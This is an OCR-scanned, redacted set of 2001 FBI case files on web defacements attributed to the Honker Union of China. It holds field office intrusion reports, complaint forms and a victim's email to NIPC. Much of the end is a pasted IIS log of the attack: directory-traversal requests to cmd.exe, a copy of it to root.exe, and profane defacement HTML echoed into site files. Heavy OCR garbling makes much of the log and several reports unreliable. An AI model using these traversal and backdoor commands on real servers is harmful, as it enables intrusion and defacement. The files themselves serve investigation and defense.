Approved By: 
Drafted By: 
Case ID d: Pending) 


Title:  HACKER/HONKER UNION OF CHINA 
ILLINOIS SECRETARY OF STATE - VICTIM; 
INTRUSION 
04/03/2001 


Synopsis: SerialL |. ] Leaa #1, covered. 


Details: For information of recipients, the Cincinnati Division 
recently executed a search warrant on a subject who stole 
computer passwords from a shareholder account in New York, New 
York. 


During the interview, the subject admitted to defacing 
approximately six Chinese web sites. This subject, whose name 
will remain protected, advised that he is a member of the hacker 
group known to deface Chinese web sites. Upon the subject's 
sentencing date, this subject has agreed to cooperate with the 
Cincinnati Division and will be utilized as a confidential source 
targeting unauthorized computer intrusion matters. 


Subsequent an "official" debriefing of this subject, 
Cincinnati Division will share the information concerning 
captioned matter to the Chicago Division. 


"nc 


b3 
b6 
b7C 
b7E 


b3 
b7E 


To: i i From: Cincinnati 
Re: 05/29/2001 


LEAD (s): 
Set Lead 1: (Adm) 
COUNTERTERRORISM 


AT WASHINGTON, DC 


Read and Clear. 
Set Lead 2: (Adm) 
CHICAGO 


AT CHICAGO, IL 


Read and Clear. 


++ 


b3 
b7E 
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FEDERAL BUREAU OF INVESTIGATION 
Precedence: ROUTINE Date: 05/30/2000 
To: Counterterrorism Attn: Computer Investigations 
Unit, Room 5965 National 
Infrastructure Protection 
Center (NIPC) 
b3 
From: St. Louis b6 
b7C 
Approved By: b7E 
Drafted By: 
Case ID i: 
Title: Subject: _HONKER UNION OF CHINA; 
Victim: ST. LOUIS BRIDGE COMPANY 
Type: COMPUTER INTRUSTON 
Date: March 24, 2001 
SUBMISSION: X Initial L1 Supplemental L1 Closed 
CASE OPENED: . 05/17/2001 
CASE CLOSED: 05/30/2001 (Referred to Chicago Division) 
O No action due to state/local prosecution 
(Name/Number: : ) 
O USA declination 
O Referred to Another Federal Agency 
(Name/Number: ) 
O Placed in unaddressed work 
X Closed administratively 
O Conviction 
COORDINATION: FBI Field Office St. Louis 
Government Agency 
Private Corporation 
VICTIM 
Company name/Government agency:__St. Louis Bridge Company _ 
Address/location:__655 Landmark Drive, Arnold, MO 63010 
Purpose of System:___ Network System, Intranet, Banking Info Software 
Highest classification of information stored in system; 
b3 


15 1.0th b6 
qp | as 


To: — Il From: St. Louis 


b7E 


System Data: 
Hardware/configuration (CPU): Intel Pentium II 450 (Generic) 
Operating System: — Windows NT 4.0 SP 6 | 
Software : PC Banking from Cass Bank-St. Louis,MO 


Security Features: 
Security Software Installed: x yes (identify; Ascend ) O no 
Logon Warning Banner: [] yes x no 


INTRUSION INFORMATION 


Access for intrusion: CO Internet connection O dial-up number O LAN (insider) 
If Internet: Internet address: 216.87.60.106 (server accessed) 


Network name: 

Method: 

Technique(s) used in intrusion: — FTP (list 
provided) 
Path of intrusion: 
addresses: 1. 2. 3 
country: 1. 2. 3: 
facility: 1. 2s 3. 
Subject: 

Age: Race: 

Sex: Education: 

Alias(S: | —— . | . ./  . Motive: 

Group Affiliation: _HONKER UNION OF CHINA 

Employer: 

Known Accomplices: 

Equipment used: 

Hardware/configuration (CPU): 

Operating System: 

Software: 
Impact: 


Compromise of classified information: O yes X no 
Estimated number of computers affected: 1 SERVER 
Estimated dollar loss to date: 


To: C— From: St. Louis 


Re: Date: 05/30/2000 b3 
b7E 
Category of Crime: 
Impairment: Theft of Information: 
L] Malicious code inserted O Classified information compromised 
O Denial of service O Unclassified information compromised 


X Destruction of information/software © Passwords obtained 
O Modification of information/software O Computer processing time obtained 
O Telephone services obtained 
L] Application software obtained 
O Operating software obtained 
Intrusion: i 
X Unauthorized access 
L] Exceeding authorized access 


REMARKS 


On May 14, 2001, the St. Louis Division received a fax 
from NIPC watch about a computer intrusion at St. Louis Bridge 
Company. The St. Louis Bridge Company had submitted an incident 


report on the same date to NIPC. The Point of Contact was[ — ] b6 
[ — — —  Eelephene number[ — — — — ] bc 


On Ma 


St. Louis Division, 
met with St. Louis Bridge 
Company. advised that one of the company's servers had 
been attacked on March 24, April 07, May 05, 2001, and May 14, 
2001. 


The attackers used the Sadmind IIS/worm to deface the 
company's intranet website possibly through the FTP utility. 
ERE a firewall, security auditing tools, and secure remote b6 
access/ authorization tools installed on the system. b7C 


The system contains banking information, bidding 
documents, employee data(names, addresses, telephone numbers). 
The entire internal employee website was destroyed. The main 
Server crashed and an attempt to destroy the hard drive was made. 
Log files had been reviewed by The user accounts to b6 
access the system had been deleted. had brought back b7c 
online the network intrusion evaluation software. 


[ | ]proviaea some IP addresses, dates and their 
intended purpose. [ ]was able to trace these IP addresses to 
China: 


05/05/01 202.97.205.4 Ran scripts 


228 


Date: 05/30/2000 b3 
b7E 
05/02/01 210.83.109.119 Ran cmd.exe Scripts 
05/02/01 62.226.241.1 Caused crash 
05/02/01 202.108.18.5 Looking for passwds 
05/04/01 211.159.23.170 Ran scripts 
discovered that the attackers had placed a b6 
backdoor program called "Kaitenz" on his system. E had used b7C 
a backup tape to recover the server. The backup caused some data 


to be lost. 


had drafted a letter explaining the incident and 
included it with the Incident Report to NIPC. provided SA 
[ with a Zip disk containing the logs of the attacks, the 
letter he se IPC and the hacker tools used on the attack of 
his system. E dise provided his Whois queries of the IP 
addresses through www.apnic.net 


The letter that[ __| drafted is attached to this 
document. 


isd  pi.otn b6 


b7C 


res e 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/30/2001 


To: Counterterrorism Attn: Computer Investigations 
Unit, Room 5965 National 
Infrastructure Protection 
Center (NIPC) 


From: St. Louis b3 
b6 
Approved By: b7C 
b7E 


Drafted By: 


Title: Subject: HONKER UNION OF CHINA 


Victim: Electranet USA : 
Type: Computer Intrusion 
Date: May 05, 2001 ; 


SUBMISSION: X Initial O Supplemental O Closed 
CASE OPENED: 05/10/2001 


CASE CLOSED: 05/30/2001 (Referred to Chicago Division) 
L] No action due to state/local prosecution 

(Name/Number: ) 

O USA declination 

L] Referred to Another Federal Agency 

(Name/Number: ) 

L] Placed in unaddressed work 

X Closed administratively 

O Conviction 


COORDINATION: FBI Field Office St. Louis Division 
Government Agency 
Private Corporation 


VICTIM 


Company name/Government agency: Electranet USA, Electric Man Internet 
Services _ 

Address/location: 754 Longlane Road, New Lenox, Illinois 60451 

Purpose ofSystem: | Web Host Server 

Highest classification of information stored in system: 


150[  p2.oth b6 
b7C 
o E S S b7E 


From: St. Louis e 
Date: 05/30/2001 


System Data: 
Hardware/configuration: (Main Server) Compag Proliance ML 370 


Pentium III,866MHz, (TestServer) IBM clone 
; Pentium III 
Operating System: — Windows 2000 Advanced Server 
Software : 


Security Features: 
Security Software Installed: O yes (identify )x no 
Logon Warning Banner: [] yes x no 


INTRUSION INFORMATION 


Access for intrusion: x Internet connection O dial-up number O LAN (insider) 
IfInternet: Internet address: 64.37.99.219 


Network name: www. jumponthebus.com 


Method: 

Technique(s) used inintrusion:; IIS Exploit (list 
provided) 
Path of intrusion: 
addresses: 1. 2. 3. 
country: 1. CHINA 2. 3. 
facility: 1. pa 3. 
Subject: 

Age: Race: 

Sex:: Education: 

Alias(s)) — | | | | Motive: 

Group Affiliation: HONKER UNION OF CHINA 

Employer: 

Known Accomplices: 

Equipment used: 

Hardware/configuration (CPU): 

Operating System: 

Software: 
Impact: 


Compromise of classified information: O yes X no 
Estimated number of computers affected: — 2 Servers c. o LLL 


Estimated dollar loss to date: $28,216 


b3 
b7E 


To: | Counterterroril From: St. Louis e 
Re: Date: 05/30/2001 b3 


b7E 
Category of Crime: 
Impairment: Theft of Information: 
O Malicious code inserted O Classified information compromised 
L] Denial of service L] Unclassified information compromised 


X Destruction of information/software [O Passwords obtained 
X Modification of information/software O Computer processing time obtained 
O Telephone services obtained 
O Application software obtained 
O Operating software obtained 
Intrusion: 
X Unauthorized access 
O Exceeding authorized access 


REMARKS 


On May 6, 2005, | ]greetzanet vsa, b6 


telephonically contacted the St. Louis Division to report an b7C 
intrusion into his computer network system server. SA 

telephonically contacted[  — |] who lived in New Lenox, Illinois 

and scheduled an interview in St. Louis on May 10, 2001. 


On May 10, 2001, 2 er contacted L.  .]at b6 
Cybercon Data Center, 210 Nor ucker, . Louis, Missouri, b7C 
where [ .  ]had his two servers stored. ae that he 
was a self-taught web page designer, who started his own web host 


development business in August of 2000. 


E previously worked for a Internet Service 
Provider which closed. E] decided to open his own ISP and 
recruit some of the customers from his former employer. 


had approximately fifty-three customers at the time of the 
attack. 


discovered that his main server had been attacked b6 
on May 6, 2001. The intrusion was a web defacement which b7C 
contained the Chinese flag, music (believed to be the Chinese 
national anthem), and a message about President Bush being a 
murderer. [  ]had saved the web defacements, but was unable to 
retrieve any logs of the attackers activity on his server. 


On May 7, 2001,[.  ]was working remotely with his 
development and testing server and stopped to run an errand. 
upon | return he discovered that this server had been 
atta ——' This attack was a web defacement with a message about 
the USA and PoizonBOx. [ ^ ]disconnected his servers from the 


3 


i A UNE a i 
Zo; pee f 5: 05/30/2001 b 
Re: Date: 05/30/2001 


Internet after the second attack. 


The attacker(s) had deleted passwords, which denied 
[jana other users access to the servers. The attacker(s) had 
deleted the service logs, event logs and had created new 
directories with names like "fuckyou". 


An executable file called "sr.exe" was found on server. 
The reboot file had also been deleted by the attacker(s). 
was concerned how the attacker(s) were able to gain system level 
access without using passwords. 


provided SA[L. ] with some handwritten notes which 
listed the files deleted, passwords to each server, and estimated 
monetary damage to his business. 


saL___] recovered both of [ |] servers for a CART 
Xamination, but after discussing this the Chicago Division, SA 
ecided against the exams. The two servers were returned to 
on 05/18/2001. 
Since [| had written all the code for the web pages 
himself, he was able to reload the code and begin cleaning up his 
servers from the attacks. 


There are no logs for examination in this case. 


15d þ2.oth 
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(Rev. 10-01-1999) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE ` Date: 05/23/2001 


Ne a 


From: Salt Lake City 
C-6 


Approved By: 


Drafted By: 


Title: HACKER/HONKER UNION OF CHINA; x 
ILLINOIS SECRETARY OF STATE-VICTIM 
INTRUSION 
04/03/2001 


Synopsis: Report Salt Lake City Web Page Defacements. 


Enclosure(s): Enclosed for receiving office, copies of FD-71 
complaints, NIPC reports, and victim Log files concerning Web 
Page defacements. 


Details: During the week of May 7, 2001, several entities in the 
Salt Lake City area suffered identical Web page de ements. The 
web page defacements contained identical anti US 
language and disparaging remarks about the Poi 


nBox virus. 


The following is a list of the currently known victim 
entities, located in the Salt Lake City, and their currently 
available contact information. 


moo Network, Po ES 


Utah State Administrative Services,[ |  ] 


National Association of Health Data Organizations, w^ 


MAY 23 2001 


£81 - SALT LAKE | 


t 


b3 
b6 
b7C 
b7E 


b6 
b7C 


i e © 
To: Chicaqo From: Salt Lake City ] 


b7E 


AtMedica D | “ee b6 
Firewall Logs indicate that attacks originated fromn b7C 
Taiwan, Australia and Brazil. 


company, [ —— — — — — ————— ——————1v 
S State Street, SLC, UT. 
HHCube Software Technologies, L.L.C., 4822 South Nancy i 


j en, UT, 84403 
Firewall logs of this intrusion are enclosed and 
amage from the defacement was estimated at approximately 


$10,000. 


J private business V^ 
owner. Logs o e attack are enclosed. 

P5e.Health Syst l i d 
xm Lake EA UT 84109, 


Miles City, Montana, Lfi l Di i , 1604 wv 
Main aS anri City, MT 59301, 
www.ravenwerks.com. oO logs were kept o fthe intrusion, but 


estimated that the damage amounted to roughly $500. 


Rolls Royce of Park City, 6125 Silver Creek Drive, Park v 
City, 


Salt Lake Tribune Employee Access Website. 


Several requests for information from victims, such as 
additional logs, IP addresses, and total damages caused by the 
attacks, are still outstanding and will be reported to Chicago as 
they are received. 


Chicago is encouraged to directly contact any of the 
above victims if further questions arise. 


As this case is being handled on a national basis by 
Chicago Division, Salt Lake City will not open a case on these 
incidents. 


Salt Lake City Considers this lead closed. 


To: Chicago From: Salt Lake City 
b7E 
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FD-71 (Rev.3-27-95) e © 
Complaint Form 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: Negative (J See below 


Subject's name and aliases Character of case 


Computer Intrusion 


Complainant [ ] Protect Source 
b6 
b7C 


Complaint received 


C] Personal Telephonic Date 05/07/2001 Time 11:45 a 


Address of Subject Complainant's address and telephone number 
National Association of Health Data 
Organizations (801) 587-9118 


Complainant's DOB 


Scars, marks ed other data 


Employer Address Telephone 


Subject’s 
Description 


Vehicle Description 


Facts of Complaint 

eee employee of the National Association of Health Data b6 
Organizations DO), believes hackers posted web pages of an anti-U.S. b7C 
nature on the NAHDO web server. There was reference to the term Poizon 


BOx. The server is physically located at Research Park, University of 
Utah. 


Do not write in this space. 


b6 
b7C 


(Complaint received by) BLOCK STAMP 


FD-71 (Rev; 3-27-95) 
Complaint Form o 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: Negative [ ] See below 


Subject's name and aliases Character of case 


Computer Intrusion 


Complainant Protect Source 
b6 
b7C 


Complaint received 


C] Personal Telephonic Date 05/07/2001 Time 10:00 a 


Address of Subject Complainant's address and telephone number 
Sex 
Male 


University of Utah 
Social Security Number 


Employer Address Telephone 


Subject's 
Description 


Scars, marks and other data 


Vehicle Description ` 


Facts of Complaint 


an employee of the Utah Education Network of the b6 
University of Utah, believes hackers may have used one of their servers b7C 
as the spawn point for computer attacks against other servers. Based on 
the content of the intrusions, he believes the hackers may be Chinese. 
The server that was attacked previously had a minimal security protocol 
implemented. It is physically located at the Granite School District 
Office. 


Do not write in this space. 


b6 
b7C 


. (Complaint received by) BLOCK STAMP 


FD-71 (Rev.3-27-95) o 
Complaint Form ^ 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: Negative | [ ] See below 


Subject's name and aliases Character of case 


Computer Intrusion 


pu | | — 


Complaint received 


(J Personal Telephonic Date 05/07/2001 Time 10:45 a 


Address of Subject Complainant's address and telephone number 


Complainant's DOB Sex 
Male 


Scars, marks and other data 


Employer . . Address Telephone 


Subject’s 
Description 


Vehicle Description 


Facts of Complaint 


[ _ an employee of Atmedica, believes hackers broke through 
the firewalls of one of their web servers. Hackers were able to post some 
of their web content. Firewall logs indicate the attacks came from 
Taiwan, Australia, and Brazil. Based on the content of the intrusions, 
and the reference to the term Poison Box, it is believed the hackers are 
pro-Chinese. 


Do not write in this space. 


(Complaint received by) BLOCK STAMP 


b6 
bp7C 


b6 
bp7C 


b6 
b7c 


FD-71 (Rev. 3-27-95) 


Complaint Form & @ 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: [] Negative [|] See below 


Subject's name and aliases Character of case 


UNSUB (S) COMPUTER CRIMES 


Complainant » Protect Source 


OC Tanner 


Complaint received 


L] Personal [X] Telephonie Date 5/7/01 ` Time 4:00 pm 
Complainant's address and telephone number 


1930 S. State Street 
SLC, UT 493-3122 
Complainant's DOB Sex 


Scars, marks and other data 


Employer Address 


Address of Subject 


Subject’s 
Description 


Telephone 


Vehicle Description i 


Facts of Complaint 


Complainant stated that it was discovered someone has hacked into OC 
Tanner's internal websites which have outside links to public for retail 


sales. The unsub has altered the website and there appears to.be much 
anti-government rhetoric. 


Do not write in this space. 


TA | | 
omplaint received by) 


BLOCK STAMP 


b6 


b7C 


b6 
b7C 


n 
fi 


Subject: more info 

Date: Sun, 6 May 2001 13:54:55 -0600 
From: 

To: <nipc@fbi.gov> 


b6 
b7C 


This is from my Network Ice defender. 
128.84.234.79, hilbert.math.cornell.edu, 2001-05-06 16:04:33 


Thanks Chuck 5 | G 


HHcube Software Technologies, L.L.C. 


4822 South Nancy Drive 
South Ogden, UT 84403 


URL: www.hhcube.com 


——————————————— —Ó———Ó One 


Subject: Help ???? 


Date: Sun, 6 May 2001 13:18:47 -0600 
Ue e] EL 


To: <nipc.watch@fbi.gov> b7C 


I was reviewing my IIs logs this morning and ran across a strange entry. I 
have never seen anything like this. It placed files all over the root 

system and in my internet directories. It is not good and may be a spoof, 
but has a very bad message. I have cleared my server of any of these files, 
but am still worried how they were written to my machine. I am using the 
security patch for Is. 


Here is a copy of the W3SVCI log file. 


The Root.exe is the culprit as well as the *.asp files. I don't know when 
these are scheduled to go off or anything else about them. Maybe you could 
help clue me in. 


Thanks, 
#Software: Microsoft Internet Information Services 5.0 


~ S Version: 1.0 
#Date: 2001-05-06 10:43:05 


' & 


#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem 


cs-uri-query sc-status cs(User-Agent) 


rm he en nn —————————————— dO Ph Oe Dm e 1e e 


Subject: issue with intrusion! 


Date: Sun, 6 May 2001 13:50:37 -0600 
From: 
To: «nipc(tbi.gov. 


Date May 6 2001 

Last Name 

First Name 

Mi[ ] 

Street/Mailing Address 

4822 South Nancy Drive 

City South Ogden 

State Utah 

Zip Code/Postal Code 84403 


Country U.S.A. 


Intrusion Information 

Organization — HHcube Software Technologies 
Contact Name EN 

Street Address 


4822 South Nancy Drive 


b6 
b7C 


b6 
bp7C 


City South Ogden 

State UT 

Zip/Postal Code 84403 

Domain  hhcube.com 

IP Address 24.9.173.59 

Type of System : Commercial 

Date intrusion first detected Today 

# of users affected 10 

Hours system down 6 

Estimated dollar loss: equiment, work hours, software, accounts affected $10,000.00 

Is the intrusion/attack ongoing ? No 

Is the sysadmin logging information ? Yes 

Suspected origination domain/IP address: 128.84.234.79 

Was/is classified/national security information maintained on the affected system? No 

Insider/Hacker/Foreign etc... Cornnel University 

Was this intrusion reported to the local FBI Office ? No 

To the standard nipc@fbi.gov. 

: Code from administrators log: 

2001-05-06 10:43:05 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+dir 200 - 

2001-05-06 10:43:07 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /. /winnt/system32/cmd.exe 
/c+dir+..\ 200 - 

2001-05-06 10:43:08 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exetroot.exe 502 - 


2001-05-06 10:43:10 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^»^«body--bgcolor?63Dblack^7^«br^»^«br^»^«br^7»^«br^»^«br^7^«br^»^«ta 


9 © 


ble+width⁄%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred 

^»fuck--USA--Government^«/font^»^«tr^»^«td^»^«p-align?/03D9/22center?622^7^«fonttsize 

%3D7+color%3Dred*>fuck+PoizonBOx’<tr*>"<td’>"<ptalign%3D%22center%22”><fontts 

ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn’</html>>..//index.asp 502 - 
2001-05-06 10:43:12 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^»^«body-tbgcolor?63 Dblack^7^«br^»^«br^»^«br^7^«br^7^«br^7^«br^^^«ta 

blewidth?63D10096^7^«td^7^«p-align?63D9622center?622^^«fontsize?63D'7-color?63Dred 

^»fuck--USA-4-Government^«/font^»^«tr^»^«td^»^«p-align?03D9622center9622^^^-fonttsize 

?63D7-color?e3Dred^»fuck--PoizonBOx^«tr^»^«td^7^«p-align?63D9622center?622^7^«fontts 

ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>. / /index.htm 502 - 
2001-05-06 10:43:15 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echot<html/>"<bodytbgcolor%3Dblack/>“<br’>“<br*>*<br’><br’> “<br><br> “<ta 

ble+width%3D100%*>*<td*>*<p+align%3D%22center%22/>“<fonttsize%3D7+color%3Dred 

“>fuck+USA+Government’</font’>“<tr’>"<td/>"<ptalign%3D%22center%22’><fontt size 

%3D7+color%3Dred’>fuck+PoizonBOx’<tr’>"<td’>"<ptalign%3D%22center%22’>"<fontts 

ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn</html’>>.././default.asp 502 - 
2001-05-06 10:43:17 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho-^«html^»^«body-Fbgcolor?e3Dblack^7^«br^»^«br^»^«br^»^«br^»^«br^»^«br^?^«ta 
ble--width?63D 100%><td/><p+align%3D%22center%22/><font+size%3D7+color%3Dred 
^»fück-FUS A4 Government^«/font^»^«tr^»^«td^»^«p-align963D9622center?e22^^«fonttsize . 
%3D7+color%3Dred’>fuck+PoizonBOx’<tr’><td’><ptalign%3D%22center%22’>“<fontts 
ize%3D4+color%3Dred’*>contact:sysadmcn@yahoo.com.cn*</html’>>.././default.htm 502 - 

2001-05-06 10:43:17 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /../winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exe+root.exe 502 - 

2001-05-06 10:43:19 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^»^«body-bgcolor?63Dblack^7^«br^»^«br^»^«br^^«br^»^«br^»^«br^»^«ta 

ble--width963D 10096^»^«td^^^«p-Falign?63D9622center?622^7^-«fonttsize?63D 7--color?63Dred 

^»fuck--USA--Government^«/font^»^«tr^»^«td^»^«p-align?63D9/622center?622^7^«fonttsize 

963D7-color?e3Dred^»fuck-tPoizonBOx^«tr^»^«td^»^«p-align?63D9622center?022^7^«fontts 

ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html*>>../../Aindex.asp 502 - 
2001-05-06 10:43:19 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body-bgcolor?63Dblack^»^«br^»^«br^»^«br^^^«br^?^«br^^«br^^«ta 

ble+width%3D100%*><td/><ptalign%3D%22center%22/>"<font+size%3D7+color/%3Dred 

^»fuck--USA--Government^«/font^»^«tr^»^«td^7^«p-align963D9^22center9622^^-fonttsize 

963D7-color?e3Dred^»fuck-tPoizonBOx^«tr^»^«td^-^«p-align?63D9622center?022^7^-fontts 

ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.ca”*</html“>>../../index.htm 502 - 
2001-05-06 10:43:20 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/cechot^«html^»^«body-"bgcolor?e3Dblack^»^«br^»^«br^»^«br^»^«br^»^«br^»^«br^2^«ta. 
blet+width%3D100%><td*>*<ptalign%3D%22center%22’>“<fonttsize%3D7+color%3Dred 


e Qo 


^»fück--USA--Government^«/font^»^«tr^»^«td^7^«palign9603D9622center9?622^7^«font size 

%3D7+color%3 Dred*>fuck+P oizonBOx”<tr’>“<td’>“<p+align%3D%22center%22">“<fontts 

ize%3D4+color%3 Dred”*>contact:sysadmcn@yahoo.com.co”*</btml>>../../default.asp 502 - 
2001-05-06 10:43:21 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echot+’<html“>“<body+bgcolor%3Dblack*>“<br’>*<br*>*<br*>*<br*>*<br*><br*>"<ta 
ble+width%3D100%*>*<td*>"<p+align%3 D%22center%22’>"<font+size%3D7+color%3Dred 
“>fuck+USA+Government’</font’><tr’>"<td’>“<p+align%3D%22center%22’><fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx<tr’>“<td’>“*<ptalign%3D%22center%22“>“<fontts 
ize%3D4+color%3Dred*>contact:sysadmcn@yahoo.com.cn*</html’>>../../default. htm 502 - 

2001-05-06 10:43:23 128.84.234.79 - 24.9.173.59 80 GET /scripts/. /../winnt/system32/cmd.exe 
/ctcopy+\winnt\system32\cmd.exe+troot.exe 502 - 

2001-05-06 10:43:25 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


Ic-echo--^«html^»^«body-bgcolor?63Dblack^7^«br^»^«br^»^«br^»^«br^»^«br^»^«br^»^«ta 
blet+width%3D100%">*<td’>"<ptalign%3D%22center%22’>"<font+size%3D7+color%3Dred 
“>fuck+USA+Government</font’>“<tr’>“<td’>"<p+align”%3D%22center%22’>*<fonttsize 
%3D7+color%3Dred“>fuck+P oizonBOx’<tr’><td/>"<p+align%3D%22center%22’>"<font+s 
ize%3D4+color%3Dred“>contact:sysadmen@yahoo.com.cn*</html*>>../AdminScripts/index.as 
p 502 - 

2001-05-06 10:43:27 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/c+echo+*<himl*>"<body+bgcolor%3 Dblack*>“<br’>“<br’*>“<br’>*<br’*>“<br>*<br*>"<ta 
blet+width%3D100%>*<td’*>"<ptalign%3D%22center%22’>"<font+size%3D7+color%3 Dred 
“>fuck+USA+Government*</font’*>“<tr’><td’>"<p+align%3D%22center%22’><fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>"<td’>“<ptalign%3D%22center%22*><fontts 
ize%3D4+color%3Dred*>contact:sysadmcen@yahoo.com.cn’</html>>../AdminScripts/index. ht 
m 502 - 

2001-05-06 10:43:29 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ct+echot<html“>"<body+bgcolor%3Dblack’*>“<br’><br’><br’>“<br’><br*>"<br’*>"<ta 
ble+width%3D100%>*<td’*>*<p+align%3D%22center%22’>*<font+size%3D7+color%3Dred 
A>fuck+USA+Government’*</font’>“<tr’><td’/><ptalign%3D%22center%22’><font+tsize 
%3D7+color%3Dred*>fuck+P oizonBOx’<tr’><td’>"<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred*>contact:sysadmen@yahoo.com.cn*</html>>../AdminScripts/default. 
asp 502 - 

2001-05-06 10:43:31 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^»^«body-tbgcolor?e3Dblack^»^«br^7^«br^»^«br^»^«br^»^«br^»^«br^^^«ta 
blewidth?63D10096^7^«td^7^«p-align?63D9622center9622^^^«fonttsize?63D 7--color?63Dred 
“>fuck+USA+Government*</font*>“<tr’>*<td’>"<p+align%3 D%22center%22"><fontt size 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>*<td’*>*<ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred*>contact:sysadmen@yahoo.com.cn*</html>>../AdminScripts/default. 
btm 502 - 

2001-05-06 10:43:31 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 


e e 


/c+copy+\winnt\system32\cmd.exetroot.exe 502 - 
2001-05-06 10:43:34 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^7^«body-bgcolor?63Dblack^»^«br^»^«br^^^«br^7^«cbr^^«br^»^«br^^«ta. 

ble--width?63D 10096^—^«td^7^«p-Falign?63D9622center?622^7^«fonttsize?63D'7-color?63Dred 

^»fuck*- US A4-Government^«/font^»^«tr^»^«td^7^«p-align?/63D9622center?622^^«fonttsize 

963D7--color?e3Dred^v-fuck--PoizonBOx^«tr^»^«td^-^«p-align?63D9622center?622^^^-fontts 

ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn”*</html’>>../ftproot/index.asp 502 - 
2001-05-06 10:43:36 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot^«html^7^«body-tbgcolor?63Dblack^»^«br^»^«br^^^«br^»^«br^7^«br^7^«br^2^«ta 
ble+width%3D100%>“<td’>*<ptalign%3D%22center%22’>“<font+size%3D7+color%3Dred 
A>fuck+USA+Government”*</font/>“<tr’>*<td’>"<ptalign%3D%22center%22’>"<fonttsize 
%3D7+color%3Dred’>fuck+P oizonBOx”<tr’><td“><ptalign%3D%22center%22’>"<fontts 
ize%3D4+color%3Dred>contact:sysadmen@yahoo.com.cn*</html’>>../ftproot/index.htm 502 


2001-05-06 10:43:39 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^»^«body-bgcolor?e3Dblack^7^«br^»^«br^^^«br^7^«br^7^«br^7^«br^7^«ta 
ble+width%3D100%>*<td’>*<p+align%3D%22center%22/>“<font+size%3D7+color%3Dred 
^»fückt* US A--Government^«/font^»^«tr^»^«td^7^«p-align?03D9/022center9622^7^-font size 
%3D7+color%3Dred’>fuck+P oizonBOx’<tr’>*<td/><ptalign%3D%22center%22">"<fontts 
ize?63D4-color?63Dred^»contact:sysadmcen(g)yahoo.com.cn^«/html^?7. /ftproot/default.asp 502 


2001-05-06 10:43:42 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^»^«body-bgcolor?63Dblack^^^«br^»^«br^7^«br^7^«br^»^«br^»^«br^^^-ta 
ble+width%3D100%>*<td’>*<ptalign%3D%22center%22/>"<fonttsize%3D7+color%3Dred 
“>fuck+USA+Government”</font’><tr’>*<td’><ptalign%3D%22center%22“>*<fonttsize 
%3D7+color%3Dred’>fuck+PoizonBOx’<tr’>“<td’><ptalign%3D%22center%22”><fontts 
ize%3D4+color%3Dred’>contact:sysadmcn@yahoo.com.cn*</html>>../ftproot/default.htm 
502 - 

2001-05-06 10:43:43 128.84.234.79 - 24.9.173.59 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+copy+\winnt\system32\cmd.exetroot.exe 502 - 

2001-05-06 10:43:45 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctecho--^«html^-^«body--bgcolor?63Dblack^^«br^»^«br^»^«br^»^«br^?^«br^o^«br^»^-ta 
bletwidth%3D100%*>“<td’>*<p+talign%3D%22center%22’>“<font+size%3D7+color%3Dred 
“>fuck+USA+Government”*</font/>*<tr’><td/>*<ptalign%3D%22center%22’>"<font+size 
%3D7+color%3Dred’>fuck+PoizonBOx’<tr’>*<td*>“<ptalign%3D%22center%22">"<font+s 
ize%3D4+color%3Dred”>contact:sysadmcn@yahoo.com.cn*</html>>../iissamples/index.asp 
502 - 

2001-05-06 10:43:48 128.84.234.79 - 24.9.173.59 80 GET /scripts/root.exe 


/ctechot’<html/>"<bodytbgcolor%3Dblack/><br’>*<br*>“<br’*>*<br’*><br’>“<br*>*<ta 
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ble+width%3D100%*>“<td*>*<p+align%3D%22center%22”>"<fonttsize%3D7+color%3Dred 
“>fuck+USA+Government*</font’>“<tr’>"<td’>“<ptaligon%3D%22center%22>"<fonttsize 
